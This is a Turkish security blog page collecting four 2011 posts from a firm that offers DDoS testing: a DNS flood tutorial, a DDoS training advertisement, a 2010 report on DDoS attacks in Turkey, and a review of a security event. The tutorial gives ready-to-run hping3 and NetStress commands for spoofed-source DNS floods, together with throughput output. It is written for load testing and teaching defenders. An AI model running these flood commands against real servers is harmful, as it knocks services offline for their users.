dns flood | Complexity is the enemy of Security

Hping Kullanarak DNS Flood DoS/DDoS Saldırıları Gerçekleştirme

Huzeyfe ONAL — Mon, 25 Jul 2011 14:41:57 +0000

Internet dünyasının çalışmasını sağlayan ana protokoller incelediğinde güvenlik açısından en önemli protokollerden birinin DNS olduğu ortaya çıkmaktadır. DNS, UDP üzerinden çalışan basit bir protokoldür ve son on yıl incelendiğinde güvenlik açısından karnesi sınıfta kalacak kadar zayıftır. DNS’in bu kadar sık kullanılıyor olması da bu protokol üzerine gerçekleştirilen istismar çalışmalarını yönlendirmektedir.

DNS açısından güvenlik denildiğinde akla DNS kullanılarak gerçekleştirilen dns poisoning ve yönlendirme saldırıları ve erişilebilirliği hedef alan DDoS saldırıları gelmektedir. Özellikle DNS’e yönelik DDoS saldırıları son yıllarda ciddi oranda artış göstermektedir. DNS’in UDP üzerine bina edilmesi ve UDP üzerinden gerçekleştirilen iletişimde kaynak IP adresinin gerçek olup olmadığını anlamanın kesin bir yolunun olmaması saldırganın kendini gizleyerek saldırı gerçekleştirmesini kolaylaştırmaktadır.

DNS Flood DoS/DDoS Saldırıları

Bu saldırı tipinde genelde iki amaç vardır:

Hedef DNS sunucuya kapasitesinin üzerinde (bant genişliği olarak değil) DNS istekleri göndererek , normal isteklere cevap veremeyecek hale gelmesini sağlamak
Hedef DNS sunucu önündeki Firewall/IPS’in “session” limitlerini zorlayarak Firewall arkasındaki tüm sistemlerin erişilemez olmasını sağlamak

Her iki yöntem için de ciddi oranlarda DNS sorgusu gönderilmesi gerekir. Internet üzerinden edinilecek poc(proof of concept) araçlar incelendiğinde çoğunun perl/python gibi script dilleriyle yazıldığı ve paket gönderme kapasitelerinin max 10.000-15.000 civarlarında olduğu görülecektir.

Bu araçlar kullanılarak ciddi DNS DDoS testleri gerçekleştirilemez.

Boş UDP/53 paketi ile DNS paketi arasındaki farklar

DNS Flood saldırılarında sık yapılan hatalardan biri de DP 53 portuna gönderilen her paketin DNS olduğunu düşünmektir. Bu şekilde gerçekleştirilecek DDoS denemeleri hedef sistem önündeki IPS ve benzeri sistemler tarafından protokol anormalliğine takılarak hedefe ulaşamayacaktır. UDP port 53’e gönderilen boş /dolu(dns olmayan içerik) ve DNS istekleri farklıdır. Hping gibi araçlar kullanılarak gerçekleştirilen udp port 53 flood saldırıları DNS flood saldırısı olarak adlandırılamaz.

Ancak DNS sorgularını ikili olarak kaydedip bunları Hping kullanarak hedefe dns sorgusu gibi gönderme işlemi yapılabilir.

Aşağıda adım adım Hping kullanarak nasıl DNS flood denemeleri gerçekleştirileceği anlatılmıştır. Test edilen her alan adı için bu şekilde dns sorgusu ikili dosya olarak kaydedilmeli ve hping’e parametre olarak verilmelidir.

Ardından seçili alanı binary olarak kaydedebiliriz.

Veya aşağıdaki şekilde doğrudan seçili pakete sağ tıklayarak ikili dosya olarak kaydedilmesi sağlanabilir.

Kaydedilen dosya www.bga.com.tr adresine ait DNS sorgusunu içermektedir. Bu dosyayı hping3 kullanarak herhangi bir dns sunucusuna gönderip dns sorgusu olarak değerlendirilmesi sağlanabilir.

#hping3 –flood –rand-source –udp -p 53 dns_sunucu_ip_adresi -d 45 -E dns_bga.pcap

Hping ile DNS flood saldırılarının en önemli dezavantajı sadece bir alan adına yönelik sorgu gönderebilmesidir.

NetStress Kullanarak DNS DDoS Saldırısı Gerçekleştirme

BGA DDoS Pentest hizmetlerinde kullandığımız NetStress aracı ile saniyede 400.000-1.000.000 paket üretilebilir ve dns, udp ve ip paketine ait tüm alanlar TCP/IP protokolü özelliklerine göre isteğe bağlı olarak değiştirilebilir.

# ./netstress -d hedef_dns_ip_adresi -P 53 –attack dns -n 3 –buffer 35 –dnsqname dns.txt –dnsqtype A
^Croot@bt:~/netstress-2.0.4-dns#
———- netstress stats ———-
PPS: 133487
BPS: 8543168
MPS: 8.15
Total seconds active: 1
Total packets sent: 133487
————————————-

———- netstress stats ———-
PPS: 125066
BPS: 8004224
MPS: 7.63
Total seconds active: 1
Total packets sent: 125066
————————————-

———- netstress stats ———-
PPS: 133600
BPS: 8550400
MPS: 8.15
Total seconds active: 1
Total packets sent: 133600
————————————-

DNS Flood Saldırılarından Korunma

DNS, UDP üzerinden çalışan bir protokol olduğu için kesin bir engelleme yöntemi söz konusu değildir. Çeşitli güvenlik firmaları tarafından geliştirilen DDoS engelleme ürünlerinde DNS flood için bazı ayarlar olsa da bunlar ciddi saldırılarda genellikle işe yaramamaktadır. Bunun en temel sebebi DNS flood saldırılarında saldırganın istediği ip adresinden geliyormuş gibi saldırıyı gösterebilmesidir.

The post Hping Kullanarak DNS Flood DoS/DDoS Saldırıları Gerçekleştirme first appeared on Complexity is the enemy of Security.

DDoS Saldırıları ve Korunma Yolları Eğitimi 22-24 Mart 2011(Ankara)

Huzeyfe ONAL — Sun, 06 Mar 2011 12:06:29 +0000

DDOS saldırıları Internet dünyasının en eski ve en etkili saldırılarıdır. DDOS saldırılarına karşı kesin bir reçete olamayacağı için bu tip saldırılarla karşı karşıya kalmadan konu hakkında detaylı bilgi sahibi olmak en büyük silahtır.

Konu hakkında bilgi sahibi olmadan alınacak DDOS koruma ürünleri ayrı bir DOS’a (servis kesintisi) sebep olabilmektedir.

DDoS işine ürün odaklı değil çözüm odaklı yaklaşılmalıdır. Bunun içerisinde DDoS’dan korumak istediğiniz ağ altyapısı, saldırı esnasında neler yapılacak listesi, ISP’nin iletişim bilgileri, ddos izleme sistemleri ve en kötü durum senaryosunun hazırlanması dahildir.

Bu eğitimle birlikte sık kullanılan ve etkili olan DDOS yöntemleri, çalışma mantıkları, uygulamaları ve korunma yöntemlerini hem teorik olarak öğrenme hem de pratik olarak görme fırsatı yakalayacaksınız.

Eğitime katılarak;

Gerçek ortamlarda dos/ddos saldırıları gerçekleştirip etkilerini,
Çeşitli güvenlik ürünlerindeki DDoS engelleme özelliklerinin nasıl çalıştığı ve ciddi saldırılar esnasında ne kadar işe yaradığını
Açık kod yazılımlar kullanılarak DDoS saldırılarının nasıl farkedileceği ve engelleneceğini,
Günümüz yaygın kullanılan DDoS engelleme sistemlerinin eksikliklerini görebileceksiniz.

Eğitim Tarihleri	22-24 Mart 2011
Eğitim Adresi	İller Sok. No:4 Mebusevleri / Tandoğan / ANKARA (Gençlik Cad. Anıtkabir yanı)
Kayıt Olun	Lütfen [email protected] adresine e-posta gönderiniz.
Eğitim Ücreti	1500 TL+KDV
Eğitmenler	Huzeyfe ÖNAL
Eğitim Broşürü	DOSP
Capture The Flag	Yok
Eğitim İçeriği(Özet)	Temel TCP/IP Bilgisi Internetin Altyapısı TCP/IP Protokol Ailesi TCP/IP Ailesi Protokolleri Çalışma Yöntemleri ARP, IP, ICMP, TCP, UDP, DNS, HTTP,SMTP Protokolleri Çözülemeyen Problem DDOS Genel Kavramlar DOS Nedir? DDOS Nedir? DRDOS Nedir? DOS/DDOS Motivasyonu DDOS Sonuçları ve etkileri DDOS Yapmak ne kadar kolaydır? DOS/DDOS yapanı saldırganlar nasıl yakalanır? Örnek DDOS Saldırı İncelemeleri Yıllara Göre Yapılan Etkili DDOS Saldırıları 2007 – Root DNS Sunucularına yapılan DDOS Saldırısı 2008 Kuzey Osetya siber savaşı 2009 İran seçimleri esnasında hükümet sitelerine yapılan ddos saldırıları 2010 Wikileaks DDoS saldırıları(Paypal, Amazon, Visa..) DDOS Çeşitleri Eski Tip DDOS Yöntemleri Yeni nesil DDOS Saldırıları Web Sunuculara Yönelik ddos saldırıları DNS Sunuculara Yönelik DDOS Saldırıları Sık Kullanılan DDOS Yöntemleri Bandwidth tüketme amaçlı ddos saldırıları DDOS Atak Araçları ve Örnek DDOS Çalışmaları SynFlood saldırısı Icmp flood ddos saldırısı Web sunuculara yönelik ddos saldırıları Dns sunuculara yönelik ddos saldırıları Hping ile DDOS saldırısı Isic ile çeşitli ddos saldırıları Juno, juno-ng ile ddos saldırısı Nmap ile dos/ddos saldırısı Scanrand ile dos/ddos saldırısı Slowloris ile ddos saldırısı DDOS Saldırılarının Kaynağı BotNet Dünyası BotNet(RoBot networks) kavramı Zombi kavramı Nasıl zombi olunur Zombiler nasıl yönetilir Örnek bir zombi uygulaması vs ddos saldırısı FastFlux Networks Kavramı DDOS Atak Engelleme Yöntemleri SynFlood DDOS Saldırılarını Engelleme Yöntemleri SynCookie/ Synproxy Yöntemi SynCache yöntemi ICMP Üzerinden yapılan saldırıları engelleme yöntemleri UDP Kullanılarak yapılan DDOS Saldırılarını Engelleme DNS Sunuculara yapılan ddos saldırılarını engelleme yöntemleri HTTP GET/POST Flood DDOS Saldırılarını Engelleme Routerlar üzerinde belirli DDOS saldırılarını engelleme Kendi networkünüzden DDOs Yapılmasını engelleme Bilinen DDOS Engelleme Ürünleri ve Çalışma Yapıları Cisco Guard Arbor Peakflow Radware Defense Pro Çeşitli IPS Ürünleri ve DDOS Korumaları Mcafee ISS Sourcefire Çeşitli Firewall Ürünleri ve DDOS Korumaları CheckPoint Netscreen Fortinet Linux Iptables OpenBSD Packet Filter Pfsense

Eğitimin katılımcılara kazancı:

Internet altyapısını oluşturan temel protokollerin detay açlışma yapısı
Ağ ve güvenlik sistemlerinin DDoS saldırılarına karşı sıkılaştırılması
DDoS saldırı analizi yapabilir hale gelme
DDoS test saldırıları gerçekleştirme

Kime hitap ediyor:

Sistem yöneticileri
Ağ yöneticileri ve operatörleri
Ağ güvenliği yönetici ve operatörleri
Bilgi güvenliği uzmanları

İşleyiş:

Eğitim gerçek sistemler üzerinde uzman eğitmenler eşliğinde uygulamalı olarak gerçekleştirilecektir.

Eğitim materyalleri:

Eğitime özel Linux dağıtımı Vmware imajı
Eğitim notlarına bir yıllık online erişim hakkı
Katılım sertifikası

Eğitim Süresi:
3 gün

Eğitim Ücreti:
1500 TL+KDV , erken kayıtlarda %15 indirim imkanı sunulmaktadır.

Ön Gereksinimler:

Uygulamalı Ağ Güvenliği Eğitimi

The post DDoS Saldırıları ve Korunma Yolları Eğitimi 22-24 Mart 2011(Ankara) first appeared on Complexity is the enemy of Security.

Türkiye 2010 Yılı DDoS Raporu

Huzeyfe ONAL — Sun, 20 Feb 2011 14:36:06 +0000

DDoS tehditi her geçen gün kendisini göstermeye devam ediyor. Bilgi güvenliği bileşenlerinden “erişilebilirlik”i hedef alan bu saldırı tipini ciddiye almayan kurumlar saldırı sonrası çok daha yüksek maliyetli çözümlere yönelerek altyapı güçlendirmesine ağırlık veriyor.

Geçtiğimiz yıl Türkiye’de karşılaştığımız DDoS saldırıları ile ilgili gerçekleştirdiğimiz analiz sonucu aşağıdaki bilgiler ortaya çıkmıştır.

BGA olarak 2010 yılında karşılaştığımız ve müdahale ettiğimiz DDoS saldırı sayısı: 59

DDoS saldırı tipi:

Türkiye’de yoğun olarak syn flood, udp flood ve HTTP get flood saldırılarıyla karşılaştık. Syn flood saldırıları engellemesi en kolay saldırı tiplerinden olmasına rağmen en fazla tercih edilen saldırı tipi olmaya devam ediyor. Bunun temel nedeni Syn flood saldırılarının HTTP flood saldırılarındaki gibi gerçek ip adreslerinden yapılma zorunluluğunun olmaması.

Saldırılarda kullanılan IP adreslerinin gerçekliği:

Gelen saldırılardaki IP adreslerinin gerçekliği TCP için kesin fakat UDP için tahmine dayalıdır. UDP kullanılarak gerçekleştirilen saldırılarda eğer kullanılan botnet üzerinde spoofed ip seçeneği işaretliyse gelen saldırı paketlerinden ip adresinin gerçek ya da sahte olduğu rahatlıkla anlaşılabilir.

Gerçek IP kullanım oranının fazla çıkmasının bir sebebi de alınan saldırılarda yoğun olarak Türk botlarının kullanılması ve Türkiye’deki internet kullanıcılarının büyük çoğunluğunun NAT arkasında olması sebebiyle ip spoofing işleminin çalışmaması.

En ciddi saldırı :600 Mbps

Gelen saldırı SYN flood olduğu için kolaylıkla savuşturulabildi.

Bunun haricinde yurt dışında da bakımını yaptığımız sistemlerden birine doğru 3Gps’lik bir hafta süren ve çeşitli DDoS tiplerinin birlikte kullanıldığı saldırı aldık. Bu saldırının önündeki ISP sistemleri yeteri kadar güçlü olmadığı için kesin çözüm olarak yük dengeleme yapılarak birden fazla lokasyona sistemler dağıtılarak ve DNS ayarlarıyla oynayarak saldırının şiddeti azaltıldı.

En düşük seviyeli saldırı: 30 Mb

Saldırılarda kullanılan BotNet’lerdeki max IP adres sayısı :53.567

En ciddi saldırılardan birinde kullanılan bot sayısı 53.000 ve %90’ı Türkiye IP bloklarından.

Tüm saldırılar arasında hedef sistemin trafik kapasitesinin üzerine çıkan saldırı sayısı 5.

2010 Yılı Türkiye Siber Tehditler Sıralamasında DDoS tehditi

The post Türkiye 2010 Yılı DDoS Raporu first appeared on Complexity is the enemy of Security.

Ankara DDoS&BotNet Sorunu Etkinliği Değerlendirmesi

Huzeyfe ONAL — Wed, 16 Feb 2011 08:02:40 +0000

15 Şubat’da Bilgi Güvenliği AKADEMİSİ olarak düzenlediğimiz “Ankara DDoS&BotNet Sorunu” etkinliğine dair kısa bir değerlendirme.

İstanbul’dan güneşli bir havada yola çıkıp Ankara’da karlı bir havaya merhaba diyerek güne başladım. Ankara’da kar demek sıkıntı demek olduğu için etkinliğin gününde kar yağması biraz canımı sıksa da bu düşünceyi kafamdan atarak otele doğru yola çıktım. Otelde hazırlıklar tüm hızıyla devam ediyordu, sponsorumuz Barikat en ufak detayı bile unutmayacak şekilde hazırlıkları tamamlamaya çalışıyordu.

Derken etkinlik saati geldi, salonda beklentimizin üzerinde bir kalabalıkla (~300 kişi) açılış konuşmasını yaparak sunumlara geçtik. Ankara’da dünyada ilk defa denenen bu kadar spesifik bir etkinliğe bu oranda katılım benim için de sürpriz oldu. Sunumlar ve aralardaki konuşmalar katılımcıların yoğun ilgisi ve samimi ortam sayesinde o kadar hızlı geçti ki kendimi birden kapanış konuşmasını yaparken buldum. Ankara’da saat 5’in özel anlamı olduğu için ben de son sunumu fazla geciktirmemek için HTTP GET flood saldırısı demosunu yapamadım.

Genel olarak katılımcılar fazlasıyla memnun kaldı, her zamanki gibi zamanın biraz daha uzun olması konuların daha anlaşılır olmasına yardımcı olacaktı fakat zaman hep kısıtlıdır, mesele kısıtlı zamanda birşeyler anlatabilmektir.

Etkinlik sunumlarını şimdilik siteye koymayacağız, sadece katılımcılara e-posta ile gönderilecek. Bunun nedeni aynı etkinliğin İstanbul’da da gerçekleştirilecek olması ve etkinlikte kullandığım sunumların bir benzerini de İstanbul’da kullanma düşüncem. Şimdiden sunumları koyup heyecanı azaltmamak lazım. Kuru kuru sunumlar hiçbir zaman konuşmacının ne anlattığını yansıtmaz, sadece o konuda fikir verir.

Etkinlik kayıt esnasında yaptığımız DDoS Saldırısı Aldınız mı anketi sonucu:

Her etkinlik sonrası yaptığımız katılımcı değerlendirme anketi sonuçlarında gelen yorum ve önerilerden bazıları:

“Tamamiyle çok faydalı ve kaliteli bir etkinlik oldu. Uygulamalı olanlar daha çok ilgi çekiciydi! İlk seansta klimalar sıcak hava üfleyinde konu ne kadar ilgi çekici olsa da uyku bastırdı fakat daha sonraları soğuk hava verilince ceket ve montlarımızı giymek zorunda kaldık. Tam ortası olmadı ama etkinlik çok kaliteli bilgilendirmelerde bulundu.

“Teknik bilgi veren ve uygulamalarıyla bunu gösteren biri olması açıkçası beni çok sevindirdi. Erken kaçmayı planladığım seminerin ilk ve sunumlarını yapan huzeyfe beye çok teşekkür ederim. ilk defa bir seminer bu kadar işe yaradı.

“Uzun süredir katıldığım en verimli etkinlik. Teşekkür ederim

“- Süresi çok kısa geldi bana. Bu kadar dolu bir program için 3,5 saat az oldu bence.

– Bu konularda haftalık ya da periyodu her ne ise bir TV programı yapmanızı öneriyorum.

– Etkinlik salonu güzeldi ama çay kahve salonu küçük geldi.

– Teşekkür ederiz.

“

“Çalıştay çok kısa sürdü çok hızlı geçildi, daha fazla vakit ayırılabilse daha iyi olurdu.

Teşekkürler, sadece basit bir teşekkür olarak algılamayınız liütfen . . .”

“Her hangi bir ürüne/ürün reklamına odaklı olmadan, teknik bilgi paylaşımını amacıyla düzenlenen bu etkinliğin benzerlerinin devamı oldukça faydalı olacaktır.

“Kanımca yapılan çalışmalar güzel ancak uygulamalar daha çok bilgi güvenliği alanında faaliyet gösteren kişi veya kişilere yönelik olduğu ortadadır. Ancak kanımca yapılan uygulamaların sonucunda ortaya çıkan hukuksal sorunların değerlendirilmesi, çözüm önerileri mağdurların ne yapmaları gerektiği, suç ile mücadele kapsamında nasıl engellenebileceği veya suçluların nasıl daha etkin bir şekilde cezalandırılabileceği konusunda çalıştay ve etkinliklere eklenmesinde fayda buluyorum.

Şimdi İstanbul’da Mart sonu aynı etkinliği gerçekleştireceğiz, sonra eğer güç bulabilirsek bu etkinliği uluslarası bir etkinlik haline getirip Dubai veya İstanbul’da yapacağız.

Etkinlik ortamından birkaç resim. Diğer resimlere http://www.flickr.com/photos/59557950@N02/?saved=1 adresinden erişebilirsiniz.

The post Ankara DDoS&BotNet Sorunu Etkinliği Değerlendirmesi first appeared on Complexity is the enemy of Security.